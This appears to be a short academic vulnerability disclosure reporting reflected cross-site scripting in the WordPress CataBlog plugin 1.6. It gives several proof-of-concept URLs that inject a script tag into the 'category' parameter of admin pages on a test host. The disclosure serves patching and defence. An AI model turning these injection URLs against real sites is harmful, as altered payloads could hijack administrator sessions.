WordPress CataBlog plugin version 1.6 suffers from a cross site scripting vulnerability.
eebcfe5853a6a0d2dc6e18646b5ea9d74a1a3b3c13f654b3d64737d5c8c4fb31
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: CataBlog
Version: 1.6
Confirmed exploits:
EXPLOIT
http://wp.bacon/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script>
EXPLOIT
http://wp.bacon/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script>
EXPLOIT
http://wp.bacon/wp-admin/admin.php?page=catablog&category=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
EXPLOIT:
http://wp.bacon/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script>
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark